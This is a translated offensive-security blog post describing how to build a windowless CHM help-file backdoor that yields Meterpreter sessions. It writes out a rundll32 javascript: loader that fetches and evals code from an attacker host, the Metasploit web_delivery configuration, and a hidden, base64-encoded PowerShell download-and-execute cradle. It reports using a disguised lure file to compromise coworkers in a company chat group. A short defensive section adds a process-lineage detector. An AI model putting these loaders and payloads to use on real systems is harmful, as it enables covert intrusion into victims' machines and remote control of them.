0x00 Introduction
I previously wrote an article on client-side phishing, "Effective Phishing Using PowerShell Clients". While testing each client type, I found the CHM file the most convenient to use, but its drawback is the black console window it pops up, which makes the target aware of the attacker. So how do you keep that black window from appearing? That is what this article is about.
0x01 About CHM
Before introducing how to use a CHM as a backdoor, you first need to know what a CHM is.
CHM (Compiled Help Manual) is a compiled help file format. It is Microsoft's newer generation of help file format: HTML is used as the source text, and the help content is compiled and stored in a database-like form. CHM supports JavaScript, VBScript, ActiveX, Java applets, Flash, common image files (GIF, JPEG, PNG), audio and video files (MID, WAV, AVI), and so on, and can link to the Internet via URLs. Because it is easy to use, it is also used in various forms as an e-book format.
0x02 CHM Production
There are many ways to make a CHM and a variety of tools to do it with; I will not go into detail here. This test uses EasyCHM to make the CHM files, which is very simple to use.
Create the following directory; the file contents are arbitrary:
Open EasyCHM, choose New, and browse to select the directory. Keep the default file type:
Click Confirm to see the CHM file in the preview:
Select Compile to compile it into a CHM file.
0x03 CHM Execute Command
In 2014, @ithurricanept posted a demo on Twitter of launching the calculator from a CHM:
It used the following code:
<! DOCTYPE Html>
Write the above code into an HTML file, place it in the project directory, compile, and generate the CHM. Running the file pops up the calculator:
0x04 Removing the Pop-up Window
Anyone who has tested Nishang's Out-CHM will have noticed that running the generated CHM file shows an obvious pop-up window, like this:
One night I had a sudden idea for keeping that window from showing: use a JavaScript backdoor. After testing, I successfully obtained a Meterpreter session without any window. The test uses a modified Python version of JSRat.ps1; the address is: MyJSRat. Please refer to the README for usage.
The complete test process follows:
1. CHM combined with the JS backdoor. Start the JSRat server in interactive mode:
python myjsrat.py -i 192.168.1.101 -p 8080
Visit http://192.168.1.101:8080/wtf to get the attack code, which is as follows:
rundll32.exe javascript: "\.. \mshtml,runhtmlapplication ";d ocument.write (); H=new%20activexobject (" winhttp.winhttprequest.5.1 "); H.Open (" GET ", "Http://192.168.1.101:8080/connect", false); Try{h.send (); B=h.responsetext;eval (b);} catch (E) {new%20activexobject ("Wscript.Shell"). Run ("cmd/c taskkill/f/im rundll32.exe", 0,true);}
After many tests, the above command was successfully written into the CHM using the following HTML code:
<! DOCTYPE Html>
After compiling, the JS interactive shell was obtained successfully:
Executing a command directly with cmd /c pops up a black window; you can use run instead to avoid displaying it. After run, enter whoami > E:\1.txt and retrieve the output with read.
2. Getting a Meterpreter session. This test obtains the Meterpreter session by executing a PowerShell command, either directly, or automatically after the client's JS interactive shell has been obtained. Here is how:
Start MSF web_delivery:
~ msfconsole -Lq
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.1.101
lhost => 192.168.1.101
msf exploit(web_delivery) > set lport 6666
lport => 6666
msf exploit(web_delivery) > set srvport 8081
srvport => 8081
msf exploit(web_delivery) > set uripath /
uripath => /
msf exploit(web_delivery) > exploit
[*] Exploit running as background job.
msf exploit(web_delivery) >
[*] Started reverse TCP handler on 192.168.1.101:6666
[*] Using URL: http://0.0.0.0:8081/
[*] Local IP: http://192.168.1.101:8081/
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');
A client with PowerShell can obtain a Meterpreter session by executing the following command:
powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');
Because of the special characters, we can encode the above code as Base64. Save the following code to power.txt:
$n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');
Execute the following command:
cat power.txt | iconv --to-code UTF-16LE | base64
The final PowerShell command to execute is:
Powershell-ep Bypass-enc Iaakag4apqbuaguadwatag8aygbqaguaywb0acaabgblahqalgb3aguaygbjagwaaqblag4adaa7aaoaiaakag4algbwahiabwb4ahkapqbbae4azqb0ac4av Wblagiaugblaheadqblahmadabdadoaogbhaguadabtahkacwb0aguabqbxaguaygbqahiabwb4ahkakaapadsacgagacqabgauafaacgbvahgaeqauaemacg Blagqazqbuahqaaqbhagwacwa9afsatgblahqalgbdahiazqbkaguabgb0agkayqbsaemayqbjaggazqbdadoaogbeaguazgbhahuabab0aemacgblagqazqb Uahqaaqbhagwacwa7aaoaiabjaeuawaagacqabgauagqabwb3ag4ababvageazabzahqacgbpag4azwaoaccaaab0ahqacaa6ac8alwaxadkamgauadeanga4 Ac4amqauadeamaaxadoaoaawadgamqavaccakqa7aa
To get a Meterpreter session directly, use the execute-command mode:
Python myjsrat.py-i 192.168.1.101-p 8080-c "Powershell-ep bypass-enc IAAKAG4APQBUAGUADWATAG8AYGBQAGUAYWB0ACAABGBLAHQ Algb3aguaygbjagwaaqblag4adaa7aaoaiaakag4algbwahiab
During the test, from running the CHM to obtaining Meterpreter, nothing abnormal was visible on the client: no black window popped up at all, and the Meterpreter session was obtained, as shown:
3. Will it get caught by AV? Many people will probably ask whether it is detected. Below is the VirScan result:
http://r.virscan.org/report/6173ee9c62d29806bb84035a8f1738ba
0x05 Usage Scenarios
A picture says it all (let me guess: you wouldn't click):
Note: I just casually picked a few exploit tools and renamed the file after them; this does not mean the tools shared by their original authors have any problem.
0x06 Real-world Test
Make the CHM file as described above and give it a more attractive name, for example post a file named "Making an undetectable backdoor" in the company's tech chat group. The actual test results are as follows:
Meterpreter sessions from multiple people were obtained.
0x07 Defense
So far I have not found a good defensive posture; anyone who knows one, please share. The best defense is to improve personal security awareness: pay extra attention to such documents, do not open them casually, and if you really must, open them inside a virtual machine. With Procexp.exe you can see that a CHM file with a backdoor spawns a new process:
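The new process that Process Explorer shows here is also the easiest thing to alert on, and it covers the whole chain from 0x04 (hh.exe starting rundll32 with a javascript: argument, which in turn starts the hidden or encoded PowerShell stager that web_delivery prints). Below is an added example, not code from the original post, that runs that lineage check over constructed process-creation records laid out like Sysmon Event ID 1 fields (ParentImage, Image, CommandLine); the records are constructed, not captured from the test above.

```python
"""Flag help-file process lineage in process-creation logs.

Added example, not code from the original post. The records below are
constructed in the shape of Sysmon Event ID 1 (ProcessCreate) fields
(ParentImage, Image, CommandLine); they were not captured from the test.
"""
import re

# hh.exe renders help files; it has no business starting interpreters.
INTERPRETERS = {"rundll32.exe", "cmd.exe", "powershell.exe",
                "mshta.exe", "wscript.exe", "cscript.exe"}
# rundll32 abused as a JavaScript host (the loader in 0x04 starts this way)
RUNDLL32_JS = re.compile(r"rundll32(\.exe)?\s+javascript:", re.I)
# hidden-window or encoded PowerShell, as the web_delivery stager uses
PS_HIDDEN = re.compile(r"powershell(\.exe)?\b.*(-w\s+hidden|-enc\s|-encodedcommand)", re.I)


def image_name(path):
    """Bare executable name, lower-cased, from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of reasons this record looks like a CHM-launched backdoor."""
    reasons = []
    parent = image_name(event.get("ParentImage", ""))
    image = image_name(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    if parent == "hh.exe" and image in INTERPRETERS:
        reasons.append(f"hh.exe spawned {image}")
    if RUNDLL32_JS.search(cmdline):
        reasons.append("rundll32 javascript: loader")
    if parent in {"hh.exe", "rundll32.exe"} and PS_HIDDEN.search(cmdline):
        reasons.append("hidden/encoded PowerShell under help-file lineage")
    return reasons


def find_suspicious(events):
    """(EventRecordID, reasons) for every record with at least one reason."""
    hits = []
    for event in events:
        reasons = classify(event)
        if reasons:
            hits.append((event["EventRecordID"], reasons))
    return hits


# Constructed sample records: a help file opened normally, the chain the
# post describes (hh.exe -> rundll32 -> powershell), and an unrelated script.
SAMPLE_EVENTS = [
    {"EventRecordID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\hh.exe",
     "CommandLine": r'"C:\Windows\hh.exe" C:\Users\alice\Downloads\free_tool.chm'},
    {"EventRecordID": 2, "ParentImage": r"C:\Windows\hh.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": 'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";<loader body omitted>'},
    {"EventRecordID": 3, "ParentImage": r"C:\Windows\System32\rundll32.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -ep bypass -enc <base64 omitted>"},
    {"EventRecordID": 4, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for record_id, reasons in find_suspicious(SAMPLE_EVENTS):
        print(record_id, "; ".join(reasons))
```

The parent check is the durable part: whatever the loader looks like, a help viewer that starts an interpreter is the event to investigate, and the same rule would fire on Out-CHM's plain cmd /c variant as well as the windowless rundll32 one.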
If you encounter this kind of backdoor, tracing it is actually very simple: a CHM can be decompiled back into HTML. You can decompile it with the hh.exe that ships with Windows. The command is as follows:
C:\Users\evi1cg\Desktop>hh -decompile test poc.chm    # "test" is the output folder in the current directory
The result of running it is as follows:
0x08 Summary
This test combines several known attack techniques; the result is a bundled backdoor that is more covert and close to "perfect". The one fly in the ointment is a short lag when the file opens. Sometimes small vulnerabilities, combined, can cause great harm, and small tricks, combined, can become a big weapon. This technique is presented in the spirit of sharing; I hope it helps readers protect themselves from harm.
0x09 References
- https://twitter.com/ithurricanept/status/534993743196090368
- https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1
- http://drops.wooyun.org/tips/11764
- https://github.com/samratashok/nishang
This article was written by Evi1cg and first published on WooYun Drops.
Original title: Advanced technique combination: building a "perfect" bundled backdoor